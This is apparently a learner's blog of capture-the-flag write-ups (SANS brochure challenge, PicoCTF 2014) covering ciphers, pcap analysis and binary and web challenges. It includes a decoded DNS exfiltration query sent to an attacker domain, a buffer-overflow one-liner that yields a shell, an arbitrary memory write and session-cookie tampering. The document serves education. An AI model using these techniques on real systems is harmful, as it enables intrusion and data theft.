The first part of the challenge was simple.  It was three numbers separated by commas.  For example, 6,1,2.  These numbers corresponded to the page, paragraph, and word, respectively.  The answer was:  The password to the next part is pyWars.  Be be to “play fair”.  The flag for this part was pyWars.

“Play fair” was the hint to the next challenge.  I had never heard of a “Playfair” cipher until I used Google to find out what kind of cipher that the next part of the challenge could be.  I decoded the cipher using an online tool, called the Braingle Playfair Decoder, that omitted q’s, and deciphered the Playfair cipher for me.  The key was pyWars, which was given in the first part of the challenge.  I noticed that I had to remove the x’s.  Once deciphered, it was http://wwxw.sans.org/event/sans-twothousandandfifteen/brochure-challenge-nineninefivecazeroethreedefourninecczeroedthrexefivebfiveeightdfiveeninedax, or http://www.sans.org/event/sans-2015/brochure-challenge-995ca0e3de49cc0ed35b58d5e9da  The flag for this part was SeeYouInOrlando2015.
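The Playfair step above was done with an online decoder. As an added example (not part of the original write-up, and not the Braingle tool's code), here is a small Playfair implementation in Python that builds the key square from pyWars, omits Q the way that tool does, and decrypts. The square, the filler letter x, and the sample plaintext are assumptions chosen for the demonstration; the challenge ciphertext itself is not reproduced here. Doubled letters and an odd tail are padded with x, which is why the decoded URL still contained the x's that had to be stripped by hand.

```python
import string

def playfair_square(key, omit="q"):
    """5x5 key square: the key's letters first (duplicates dropped), then the
    rest of the alphabet.  One letter must be left out to fit 25 cells; the
    Braingle decoder used in the write-up omits Q, which is assumed here."""
    cells = []
    for ch in (key + string.ascii_lowercase).lower():
        if ch.isalpha() and ch != omit and ch not in cells:
            cells.append(ch)
    return [cells[i:i + 5] for i in range(0, 25, 5)]

def prepare(text, omit="q", filler="x"):
    """Plaintext to digraphs: keep letters only, drop the omitted letter, put
    the filler between doubled letters, and pad an odd tail with the filler."""
    letters = [ch for ch in text.lower() if ch.isalpha() and ch != omit]
    out, i = [], 0
    while i < len(letters):
        a = letters[i]
        b = letters[i + 1] if i + 1 < len(letters) else filler
        if a == b:
            out += [a, filler]
            i += 1
        else:
            out += [a, b]
            i += 2
    return "".join(out)

def _transform(digraphs, key, shift):
    square = playfair_square(key)
    where = {ch: (r, c) for r, row in enumerate(square) for c, ch in enumerate(row)}
    out = []
    for a, b in zip(digraphs[::2], digraphs[1::2]):
        (ra, ca), (rb, cb) = where[a], where[b]
        if ra == rb:                      # same row: step right (+1) or left (-1)
            out += [square[ra][(ca + shift) % 5], square[rb][(cb + shift) % 5]]
        elif ca == cb:                    # same column: step down (+1) or up (-1)
            out += [square[(ra + shift) % 5][ca], square[(rb + shift) % 5][cb]]
        else:                             # rectangle: each letter takes the other's column
            out += [square[ra][cb], square[rb][ca]]
    return "".join(out)

def playfair_encrypt(plaintext, key):
    return _transform(prepare(plaintext), key, +1)

def playfair_decrypt(ciphertext, key):
    """Returns the digraph-form plaintext; the filler x's are left in place,
    which is why the write-up had to strip them by hand."""
    letters = "".join(ch for ch in ciphertext.lower() if ch.isalpha())
    if len(letters) % 2:
        raise ValueError("Playfair ciphertext must have an even number of letters")
    return _transform(letters, key, -1)

if __name__ == "__main__":
    # Constructed sample, not the challenge ciphertext.
    ct = playfair_encrypt("SEEYOUINORLANDO", "pyWars")
    print(ct, playfair_decrypt(ct, "pyWars"))
```

The key square for pyWars starts with the row p y w a r; if a decoder omits J instead of Q (the other common convention), the square and the result change, so check which convention a tool uses before trusting its output.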

The last part was a little more challenging.  I had to analyze a pcap and extract a flag from it.  The hint was given that the creator was suspicious that powercat.ps1 was used to extract the flag from the computer that the creator of the challenge was using.  Looking at the pcap, I noted that it was all DNS traffic and that the query types were TXT.  I'm not familiar with powercat, so I looked up the documentation about it.  Then for good measure, I looked up TXT queries to see what they are.  I noted that the response answers were text, so I tried in vain to decode them with a hex to text decoder from http://www.asciitohex.com.  Then I realized that I was looking at the wrong part.  I needed to know what the attacker was asking.  So, I tried to decode the hex of the queries into ASCII format.  That didn't work.  I noted that Wireshark had "TXT String" under the type of DNS query, so I found a hex to string decoder, on http://www.string-functions.com, and sure enough, the first record that I looked at said, "cmd.exe".  It wasn't long before I found a record, packet 103, that had this query:

6a040137d56005e844747970652062726f63687572655f666c61672e7478.740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c.62726f63687572653e.c2.xattackers-domain.com

It decoded to “type brochure_flag.tx?”.  Then it showed a jumble of weird characters.  Obviously, there was some reason that I wasn’t getting the correct flag after that command.  I took the hex on that query apart, cutting out the part where the flag should be typed.  I suspected that I could use the periods in the query as a delimiter.  So, I took out the middle part of the query:

740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c

I used the converter on this part alone, and I got the last flag which was BrochureSwanMickey.
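Splitting the query name on its dots and hex-decoding each label is exactly what a script should do for the whole capture rather than one packet. The following Python decoder is an added example, not part of the original write-up or of powercat; it takes the packet 103 query name exactly as transcribed above, decodes every even-length hex label in order, and pulls out the FLAG= line. The regular expression for the flag and the assumption that every data label is hex are mine; the label c2 is valid hex and is treated as data, which is right for this query but means a real filter should strip the known base domain first.

```python
import re

# The packet 103 query name exactly as transcribed in the write-up above.
SAMPLE_QUERY = (
    "6a040137d56005e844747970652062726f63687572655f666c61672e7478."
    "740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c."
    "62726f63687572653e.c2.xattackers-domain.com"
)

HEX_LABEL = re.compile(r"^[0-9a-fA-F]+$")

def hex_labels(qname):
    """Labels that are even-length hex; everything else (the attacker's
    domain) is carrier, not data."""
    return [lab for lab in qname.rstrip(".").split(".")
            if HEX_LABEL.match(lab) and len(lab) % 2 == 0]

def decode_query(qname):
    """Concatenate the decoded bytes of all data labels in order."""
    return b"".join(bytes.fromhex(lab) for lab in hex_labels(qname))

def decode_stream(qnames):
    """Reassemble several queries (in capture order) into one byte stream."""
    return b"".join(decode_query(q) for q in qnames)

def printable(data):
    """Show the stream the way a terminal would, masking binary bytes."""
    return "".join(chr(b) if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D) else "."
                   for b in data)

def find_flag(data):
    """Assumed flag format: FLAG=<letters, digits, underscores>."""
    match = re.search(rb"FLAG=([A-Za-z0-9_]+)", data)
    return match.group(1).decode() if match else None

if __name__ == "__main__":
    stream = decode_query(SAMPLE_QUERY)
    print(printable(stream))
    print("flag:", find_flag(stream))
```

To feed it a whole capture, export the TXT query names in order with tshark (`tshark -r capture.pcap -Y "dns.flags.response == 0 && dns.qry.type == 16" -T fields -e dns.qry.name`) and pass the lines to decode_stream; the leading bytes of each label group that do not decode to text are framing, and the command echo, the file contents and the next prompt all appear in sequence.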

Sunday, March 22, 2015

More PicoCTF 2014 Solutions-Next 12

I haven't been working on this that much. I wasn't eligible for the rewards, but I started it because I saw it as a good opportunity to learn. I am eligible for other challenge rewards though, so those have been at the top of my priority list lately. I'm currently doing Cyber Aces, and later this month, I plan to try the US Cyber Challenge. I've had a little time lately, so here are more Picoctf 2014 solutions.

Javascrypt
I looked at the website with Mozilla Firefox, right-clicked, and clicked on View Source. I read through it until I found a piece of javascript that appeared to generate the key. I copied and pasted it into a javascript editor that I had found via Google and added HTML code so that I could make it calculate and display the key for me in a nice manner. Here is my code:
<!DOCTYPE html>
<html>
<body>
<p>What is the key?</p>
<p id="demo"></p>
<script>
var key;
function generateKey() {
  var i = 1;
  var x = 208;
  var n = 5493;
  while (i <= 25) {
    x = (x * i) % n;
    i++;
  }
  key = "flag_" + Math.abs(x);
}
generateKey();
document.getElementById("demo").innerHTML = key;
</script>
</body>
</html>
My flag was flag_1596.

Easy Overflow
In Java, the max value of a 32 bit signed integer is 2,147,483,647. In order to cause an overflow, all I had to do was to add the max number to the number that I was given. (I'm not exactly sure how that caused the number to become negative, because I haven't studied memory registers in great depth. I plan to do that soon.) I understand the idea of an overflow, in other words, memory registers only hold so big of values, and when one register can't hold a value, because it's too big, the rest of that value overflows into another part of memory, hence the term "overflow". I don't understand exactly how that works. I just vaguely remembered in java that we had to assign values according to size, and that each type could only hold so much. That's the reason that I knew the max value for a java 32 bit signed integer. My number was 4706106. Adding the max value that a Java integer could hold caused the number to be -2142777543. The flag was That_was_easssy!
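What actually happens in that addition is two's-complement wraparound, not a spill into neighbouring memory: a Java int keeps only the low 32 bits of the result, and bit 31 is read as the sign. The following Python snippet, an added example rather than anything from the challenge, models a Java int so the number above can be checked without a JVM; the function names are mine.

```python
INT_MAX = 2**31 - 1          # Java Integer.MAX_VALUE
INT_MIN = -2**31             # Java Integer.MIN_VALUE

def to_int32(value):
    """What a Java int holds after an operation: keep the low 32 bits and
    reinterpret bit 31 as the sign bit (two's complement)."""
    value &= 0xFFFFFFFF
    return value - 2**32 if value & 0x80000000 else value

def java_add(a, b):
    """Java's int addition: no exception, the result silently wraps."""
    return to_int32(a + b)

def smallest_overflowing_addend(n):
    """Smallest positive addend that pushes n past INT_MAX into negative
    territory; anything larger (up to INT_MAX) also works."""
    return INT_MAX - n + 1

if __name__ == "__main__":
    print(java_add(4706106, INT_MAX))                       # the value from the challenge
    print(java_add(4706106, smallest_overflowing_addend(4706106)))
```

Adding INT_MAX to 4706106 gives 2152189753, which does not fit in 31 bits; bit 31 is set, so Java reads it as 2152189753 minus 2^32, the negative number above.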

Write-Right
I used the GNU Debugger (gdb -q) and then typed p &secret to get the memory address of secret. I just looked for the memory address of secret and took note of it. The address was 0x804a03c. Then I ran the program and answered the question, "Where would you like to write in memory?" with the address of secret, and answered the question, "What would you like to write there?" with 1337beef. Then I was given the flag. The flag was arbitrary_write_is_always_right

Overflow 1
This challenge had a nice interactive feature to help one understand how the machine places values into memory. The server happens to use Little Endian format, which means that it stores the least significant byte in the smallest address. My objective was to overwrite the value of secret to hexadecimal c0deface. I looked at how someone solved a similar problem in picoctf2013 to get an idea of how to solve this one, and utilized that knowledge to solve this problem. Most Linux systems have a python interpreter installed, so I just used python. ./overflow1 $(python -c 'print "A"*16 + "\xce\xfa\xde\xc0"'). I got a shell. Then I just typed ls, to list what was in the directory, and used cat flag.txt to get the flag: ooh_so_critical. If I'd overshot that narrow point in memory, which is allowed to be written in, then I would've gotten a segmentation fault for trying to write to an area in memory that is read only. I recently read a nice article about it called, "Smashing the Stack for Fun and Profit" by Aleph One. I didn't understand all of it because I'm not familiar with assembly, but I highly recommend it to read. It's an interesting view into memory.
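The one-liner above works because the 4 bytes written after the 16 bytes of padding land on the variable next to the buffer, and because they are in little-endian order. As an added example (not the challenge binary and not the original write-up's code), the Python below builds the same payload with struct.pack and then models the vulnerable frame as a 16-byte buffer followed by a 4-byte secret, copied with strcpy's rules. The frame layout, the buffer length and the strcpy-style copy are assumptions that mirror the description; the real binary may differ.

```python
import struct

def build_payload(buffer_len, value, byte_order="<"):
    """Filler to reach the end of the buffer, then the target value packed as
    four bytes; '<' is little-endian, the order the challenge server uses."""
    return b"A" * buffer_len + struct.pack(byte_order + "I", value)

def strcpy_into_frame(payload, buffer_len=16, secret=0):
    """Model the vulnerable frame: a char buffer immediately followed by the
    4-byte 'secret'.  Copy with strcpy's rules (no length check, stop at the
    first NUL) and return the secret as the program would read it back."""
    frame = bytearray(buffer_len) + bytearray(struct.pack("<I", secret))
    for offset, byte in enumerate(payload):
        if byte == 0:                 # strcpy stops here; argv can't carry a NUL anyway
            break
        if offset >= len(frame):
            raise MemoryError("payload runs past the modelled frame")
        frame[offset] = byte
    return struct.unpack("<I", bytes(frame[buffer_len:buffer_len + 4]))[0]

if __name__ == "__main__":
    payload = build_payload(16, 0xC0DEFACE)
    print(payload[16:])                          # b'\xce\xfa\xde\xc0'
    print(hex(strcpy_into_frame(payload)))       # 0xc0deface
```

Two things the model makes visible: packing the same value big-endian ('>') puts the bytes in the wrong order and the program reads back 0xcefadec0, and a target value containing a 0x00 byte is cut short by the NUL, which is why such values cannot be delivered through argv at all.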

Redacted
I just copied the page using the press-and hold on the screen of my iPad, and pasted the page into my Notes app. It saved the page. The background was black, and the text was white. There were no more black boxes on the page in my Notes app, so I could read the entire page.

Toaster Control
I looked at the source code of the page. In the javascript, I found the handlers for the other buttons, so I knew how to query the db for the action that I needed, which was Shutdown & Turn Off. The handler had to be url encoded. I looked up those encodings on Google. So the full address was web2014.picoctf.com/toaster-control-1040194/handler.php?action=Shutdown%20%26%20Turn%20Off.

ZOR**Update**

Thanks to Anonymous' comment "dog crap", :D, I noticed that I forgot to add the new "solution" method to the terminal command and a couple of typos.  I added the original program and modified version to hopefully make the solution more clear.  Thanks!  If you all notice anymore typos/errors, let me know.  I'll be happy to fix them.  This blog is more like a journal.  I reference it if I have trouble remembering something; so I'd like it to be as accurate as possible.

The hint states that the key is turned into a one byte binary key, which means that there are only 256 possible values that the key could be (0 through 255). The 00000000 byte doesn't count, since XOR with 0 leaves the data unchanged. All I had to do was to modify the ZOR.py program and add a solution method. Then I had to add a call to that method in the main function. All that the solution method does is to use the xor method already present in the program to test every possible key from 00000000-11111111. (I know, I said that the 0 byte didn't count. It was just plain easier to figure out the syntax.) It took me a while to figure out the syntax because I'm not familiar with python. I just copied the syntax of the other methods, and it worked just fine. I did have previous experience with Java, so I could understand the idea of what the program was doing. The main annoyance was the indenting.  (If it doesn't work, play around with the indenting.  I copied the syntax of the methods around it.  Another item of note:  sometimes some text editors can cause issues with the python program working properly, so be careful with which ones you use.  For some reason, lately, I've also noticed that if you don't specify an encoding, python doesn't particularly care for that either.)

The solution method:

def solution(input_data):
    decrypted = ""
    for key in range(256):      # every single-byte key, 0 through 255
        decrypted += xor(input_data, key)
        decrypted += " begin/end "
    return decrypted

I used the "decrypted += " begin/end " line so that I could tell where each separate attempt began and ended. I guess that I could've used a newline character, to make it easier to read.


The calling method: I added it right under the decrypt elif statement.

elif sys.argv[1] == "solution":
    result_data = solution(input_data)

I ran the program from the command line by typing, "python ZOR.py solution encrypted decryptedfile 25"
I added the 25 at the end to get past that annoying 5 char requirement at the beginning of the program. I could probably just remove that "if len (sys.argv) < 5: usage()" line from the program, and not worry about that.
After running the file, I looked at the file by using "cat decryptedfile | less". When you print out the decrypted file, you'll see all sorts of junk because it is printing out every possible key value.  If you look through the junk, you'll eventually see this:

This message is for Daedalus Corporation only. Our blueprints for the Cyborg are protected with a password. That password is 85bcdc9f283353a3e0ca9c4cc1c0dc
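Dumping all 256 candidates and reading through the junk works, but a few lines of scoring let the script pick the key itself. The following is an added example written for Python 3, not the challenge's ZOR.py and not part of the original write-up: it reimplements the script's password-to-single-byte-key step, encrypts a constructed message (not the challenge file) under the password "secret", and then ranks every possible key by how much of the output looks like lowercase English. The scoring rule and the sample text are assumptions of mine.

```python
def derive_key(password):
    """ZOR.py's password step: every password collapses to one byte, so the
    password itself never needs to be recovered."""
    key = 0
    for ch in password:
        key ^= (2 * ord(ch) + 3) & 0xFF
    return key

def xor_bytes(data, key):
    return bytes(b ^ key for b in data)

def english_score(data):
    """Count bytes that are a space or a lowercase letter.  Every wrong key
    turns at least the spaces into something else, so the true key wins."""
    return sum(1 for b in data if b == 0x20 or 0x61 <= b <= 0x7A)

def rank_keys(ciphertext, top=3):
    """Try all 256 single-byte keys (key 0 is the identity: if the text already
    reads well under key 0 it was never encrypted) and return the best
    candidates as (score, key, plaintext), best first."""
    scored = [(english_score(xor_bytes(ciphertext, k)), k, xor_bytes(ciphertext, k))
              for k in range(256)]
    scored.sort(reverse=True)
    return scored[:top]

# Constructed sample, not the challenge's encrypted file.
SAMPLE_PLAINTEXT = (b"this message is for daedalus corporation only. "
                    b"the blueprints are protected with a password.")
SAMPLE_CIPHERTEXT = xor_bytes(SAMPLE_PLAINTEXT, derive_key("secret"))

if __name__ == "__main__":
    for score, key, text in rank_keys(SAMPLE_CIPHERTEXT):
        print(score, key, text[:40])
```

The challenge's real file has mixed case and punctuation, so a production version would score with a letter-frequency table instead; the shape of the attack (try every key, score, sort) stays the same.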

Here is the original program:
#!/usr/bin/python

import sys

"""
Daedalus Corporation encryption script.
"""

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)

    return result

def encrypt(input_data, password):
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)

    return xor(input_data, key)

def decrypt(input_data, password):
    return encrypt(input_data, password)

def usage():
    print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0])
    exit()

def main():
    if len(sys.argv) < 5:
        usage()

    input_data = open(sys.argv[2], 'r').read()
    result_data = ""

    if sys.argv[1] == "encrypt":
        result_data = encrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "decrypt":
        result_data = decrypt(input_data, sys.argv[4])
    else:
        usage()

    out_file = open(sys.argv[3], 'w')
    out_file.write(result_data)
    out_file.close()

main()

Here is the modified program:



#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys

"""
Daedalus Corporation encryption script.
"""

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)

    return result

def encrypt(input_data, password):
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)

    return xor(input_data, key)

def decrypt(input_data, password):
    return encrypt(input_data, password)


def solution(input_data):
    decrypted = ""
    for key in range(256):      # every single-byte key, 0 through 255
        decrypted += xor(input_data, key)
        decrypted += " begin/end "
    return decrypted

def usage():
    print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0])
    exit()

def main():
    if len(sys.argv) < 5:
        usage()

    input_data = open(sys.argv[2], 'r').read()
    result_data = ""

    if sys.argv[1] == "encrypt":
        result_data = encrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "decrypt":
        result_data = decrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "solution":
        result_data = solution(input_data)
    else:
        usage()

    out_file = open(sys.argv[3], 'w')
    out_file.write(result_data)
    out_file.close()

main()

Substitution
This one was easy. I found a nice website using google called cryptoclub.org. They have a nice Flash Substitution Decrypter. The hint in this challenge states to use frequency analysis to solve this puzzle. However, I decided to try to find the word authorization since I was fairly certain that that word was in the cipher, considering that I was looking for an authorization code. The only word that seemed long enough to be authorization was right at the beginning of the cipher, so I just replaced those encrypted letters with the decrypted letters for authorization. It turned out to be correct. Then I solved the words, "the", "code", and "is". After that, finding the substitutions for the other words weren't that difficult because there were recognizable words. The authorization code is "motherknowsbest". That was the flag for this challenge. The encrypted file ended up being a song from the movie Tangled, called "Mother Knows Best".
encrypted letters: abcdefghijklmnopqrstuvwxyz
plaintext letters: syhuwamrefcdvklbqxipjnzgto
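Guessing that "authorization" was in the ciphertext is a crib attack, and the reason it worked is that a monoalphabetic substitution preserves the pattern of repeated letters inside a word. The Python below is an added example, not the cryptoclub.org tool and not part of the original write-up: it encodes the recovered key above, builds a constructed sample sentence (not the challenge file), finds the ciphertext word whose repeat pattern matches the crib, turns the match into a partial key, and shows the partial decryption alongside a letter-frequency count. The sample sentence and the helper names are mine.

```python
from collections import Counter

# The key recovered in the write-up: ciphertext letter -> plaintext letter.
CIPHER_LETTERS = "abcdefghijklmnopqrstuvwxyz"
PLAIN_LETTERS = "syhuwamrefcdvklbqxipjnzgto"
DECRYPT_KEY = dict(zip(CIPHER_LETTERS, PLAIN_LETTERS))
ENCRYPT_KEY = {p: c for c, p in DECRYPT_KEY.items()}

def substitute(text, key):
    """Apply a letter map; anything not in the map (spaces, punctuation) passes through."""
    return "".join(key.get(ch, ch) for ch in text)

def word_pattern(word):
    """Canonical repeat pattern: 'authorization' -> '0.1.2.3.4.5.6.7.0.2.6.4.8'.
    A simple substitution cannot change this, so it survives encryption."""
    seen = {}
    return ".".join(str(seen.setdefault(ch, len(seen))) for ch in word)

def crib_candidates(ciphertext, crib):
    """Ciphertext words that could be the crib: same length, same repeat pattern."""
    target = word_pattern(crib)
    return [w for w in ciphertext.split() if word_pattern(w) == target]

def partial_key_from_crib(cipher_word, crib):
    """Letter map implied by lining the crib up with a candidate; None if the
    same cipher letter would have to mean two plain letters."""
    key = {}
    for c, p in zip(cipher_word, crib):
        if key.get(c, p) != p:
            return None
        key[c] = p
    return key

def partial_decrypt(ciphertext, key):
    """Show what the partial key reveals; unknown letters become '_'."""
    return "".join(key.get(ch, "_") if ch.isalpha() else ch for ch in ciphertext)

def frequencies(ciphertext):
    """Most common ciphertext letters first; in English plaintext the top
    ones usually map to e, t, a, o, i, n."""
    return Counter(ch for ch in ciphertext if ch.isalpha()).most_common()

# Constructed sample sentence, not the challenge's ciphertext.
SAMPLE_PLAIN = "the authorization code is motherknowsbest"
SAMPLE_CIPHER = substitute(SAMPLE_PLAIN, ENCRYPT_KEY)

if __name__ == "__main__":
    print(SAMPLE_CIPHER)
    for word in crib_candidates(SAMPLE_CIPHER, "authorization"):
        partial = partial_key_from_crib(word, "authorization")
        print(word, "->", partial_decrypt(SAMPLE_CIPHER, partial))
    print(frequencies(SAMPLE_CIPHER)[:5])
```

On a long ciphertext several words can share the crib's pattern; each candidate gives a partial key, and the wrong ones quickly produce contradictions with the frequency order or with other cribs such as "the".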

Function Address
I used the GNU Debugger (gdb -q). Then I just used p &find_string to find the find_string function, and took down the address of that function. The address was the flag for this challenge.

Basic ASM
I don't have any experience with assembly, however, the creators of picoctf had examples of some nice tutorials on the subject of AT&T assembly, so I was able to solve the problem by looking at the tutorials, and changing the assembly code to pseudo-code to help visualize the problem. I was supposed to find the value of %eax before the NOP in L3.
The original code was:
MOV $26693, %ebx
MOV $979, %eax
MOV $25717, %ecx
CMP %eax, %ebx
JL L1
JMP L2
L1:
IMUL %eax, %ebx
ADD %eax, %ebx
MOV %ebx, %eax
SUB %ecx, %eax
JMP L3
L2:
IMUL %eax, %ebx
SUB %eax, %ebx
MOV %ebx, %eax
ADD %ecx, %eax
JMP L3
L3:
NOP
My pseudocode. It helped to remember that in AT&T syntax the left operand is the source and the right operand is the destination, so CMP %eax, %ebx compares %ebx against %eax and JL jumps when %ebx is less than %eax. Considering that in the assembly code the value of %ebx is greater than the value of %eax, the L1 label computations were not done. So, the computations start in the L2 label.
ebx = 26693
eax = 979
ecx = 25717
if ebx < eax
goto L1
else
goto L2
L1:
ebx *= eax;
ebx += eax;
eax = ebx;
eax -= ecx;
goto L3
L2:
ebx *= eax; //26693 * 979, ebx = 26132447
ebx -= eax; //26132447 - 979 = 26131468, ebx = 26131468
eax = ebx; //eax = 26131468
eax += ecx; //26131468 + 25717, eax = 26157185
goto L3
L3:
NOP
So the answer to "What is the value of %eax before the NOP operation?" is 26157185.
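Translating by hand is fine for twenty lines, but the same reasoning can be checked by running the listing through a tiny interpreter. The Python below is an added example, not part of the original write-up and not a real assembler: it parses the snippet above (AT&T operand order, `$` immediates, `%` registers), executes just the instructions the snippet uses, and returns the register file at the end, with 32-bit signed wraparound applied so larger inputs behave like real registers. The instruction subset, the register set and the flag handling are assumptions sized to this snippet.

```python
import re

# The listing from the challenge, as transcribed above (AT&T syntax: source
# operand first, destination second).
SNIPPET = """
MOV $26693, %ebx
MOV $979, %eax
MOV $25717, %ecx
CMP %eax, %ebx
JL L1
JMP L2
L1:
IMUL %eax, %ebx
ADD %eax, %ebx
MOV %ebx, %eax
SUB %ecx, %eax
JMP L3
L2:
IMUL %eax, %ebx
SUB %eax, %ebx
MOV %ebx, %eax
ADD %ecx, %eax
JMP L3
L3:
NOP
"""

def to_int32(v):
    """Truncate to a signed 32-bit register value."""
    v &= 0xFFFFFFFF
    return v - (1 << 32) if v & 0x80000000 else v

def run(listing, max_steps=10000):
    """Execute the handful of instructions the snippet uses and return the
    register file at the end (the NOP at L3 is the last instruction)."""
    lines = [l.strip() for l in listing.splitlines() if l.strip()]
    labels = {l[:-1]: i for i, l in enumerate(lines) if l.endswith(":")}
    regs = {"eax": 0, "ebx": 0, "ecx": 0}
    less = False          # outcome of the last CMP, as a signed comparison
    pc = 0

    def value(operand):   # "$123" is an immediate, "%eax" a register
        return int(operand[1:]) if operand.startswith("$") else regs[operand[1:]]

    for _ in range(max_steps):
        if pc >= len(lines):
            return regs
        line = lines[pc]
        pc += 1
        if line.endswith(":"):            # label: no operation
            continue
        op, *args = re.split(r"[,\s]+", line)
        op = op.upper()
        if op == "NOP":
            continue
        if op == "JMP":
            pc = labels[args[0]]
        elif op == "JL":                  # jump if dst < src in the last CMP
            if less:
                pc = labels[args[0]]
        elif op == "CMP":                 # CMP src, dst sets flags from dst - src
            less = value(args[1]) < value(args[0])
        else:
            src, dst = value(args[0]), args[1][1:]
            if op == "MOV":
                regs[dst] = src
            elif op == "ADD":
                regs[dst] = to_int32(regs[dst] + src)
            elif op == "SUB":
                regs[dst] = to_int32(regs[dst] - src)
            elif op == "IMUL":
                regs[dst] = to_int32(regs[dst] * src)
            else:
                raise ValueError("unsupported instruction: " + line)
    raise RuntimeError("step limit hit; infinite loop?")

if __name__ == "__main__":
    print(run(SNIPPET))
```

Changing the first immediate to something smaller than 979 makes the JL fire and sends execution through L1 instead, which is a quick way to confirm which branch the real values take.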

Spoof Proof
This one was really easy. I'm supposed to find the name of the person that doesn't belong in the network. I first looked at the ARP traffic for any ARP poisoning.  I used Wireshark to analyze the traffic. (You can sort by protocol by clicking on the "Protocol" column.)  Wireshark has a nice feature that tells when there are gratuitous ARP requests, (under Expert Information) and when it suspects that more than one machine is using the same IP Address. I found that the IP Address 192.168.50.4 had two MAC Addresses associated with it. I assumed that the MAC Address that was noted earlier in the traffic, before the potentially malicious activity, was the legitimate address, in other words, the address of the machine that is supposed to be on the network. I did a search for the other MAC Address and found that it was associated with the IP Address, 192.168.50.3, which is the IP Address of a user named John Johnson. John Johnson was spoofing an IP Address.
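The check Wireshark does under Expert Information (one IP address announced by more than one MAC) is easy to reproduce over the ARP records of a capture. The Python below is an added example, not the original write-up's method and not Wireshark's code; it runs over a small constructed list of ARP sender pairs (not the challenge pcap) and applies the same assumption as above, that the first MAC seen for an address is its legitimate owner. The record format, the sample addresses and the function names are mine.

```python
# Constructed ARP records (frame number, sender IP, sender MAC); not from the
# challenge pcap.  The host at 192.168.50.3 later starts claiming 192.168.50.4.
ARP_RECORDS = [
    (1, "192.168.50.1", "00:11:22:33:44:01"),
    (2, "192.168.50.3", "00:11:22:33:44:03"),
    (3, "192.168.50.4", "00:11:22:33:44:04"),
    (4, "192.168.50.2", "00:11:22:33:44:02"),
    (5, "192.168.50.4", "00:11:22:33:44:03"),
    (6, "192.168.50.4", "00:11:22:33:44:03"),
]

def ip_to_macs(records):
    """For each sender IP, the MACs that claimed it, in first-seen order."""
    claims = {}
    for _, ip, mac in records:
        macs = claims.setdefault(ip, [])
        if mac not in macs:
            macs.append(mac)
    return claims

def find_spoofers(records):
    """IPs claimed by more than one MAC.  The first MAC seen is treated as the
    legitimate owner (the write-up's assumption); each later claimant is
    reported together with the IP it used first, which names the spoofing host."""
    claims = ip_to_macs(records)
    first_ip = {}
    for _, ip, mac in records:
        first_ip.setdefault(mac, ip)
    findings = []
    for ip, macs in claims.items():
        for mac in macs[1:]:
            findings.append({
                "spoofed_ip": ip,
                "legit_mac": macs[0],
                "spoofer_mac": mac,
                "spoofer_ip": first_ip[mac],
            })
    return findings

if __name__ == "__main__":
    for finding in find_spoofers(ARP_RECORDS):
        print(finding)
```

The records can come straight from tshark (`tshark -r capture.pcap -Y arp -T fields -e frame.number -e arp.src.proto_ipv4 -e arp.src.hw_mac`); the first-seen rule is a heuristic, so on a capture that starts after the attack began it would blame the wrong host, and DHCP or switch logs are the tie-breaker.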

Delicious
In order to solve Delicious, I looked at the website. On the website, there was a session id. Websites use session cookies in order to keep track of sessions because http is a stateless protocol, in other words, it can't remember whether people had connected previously or not on its own. So, I installed an Add-On to my browser called Mozilla Firefox Cookie Editor. I changed the session_id of the cookie to 30. I was logged in as Dr. Florian Richards. The secret code was session_cookies_are_the_most_delicious.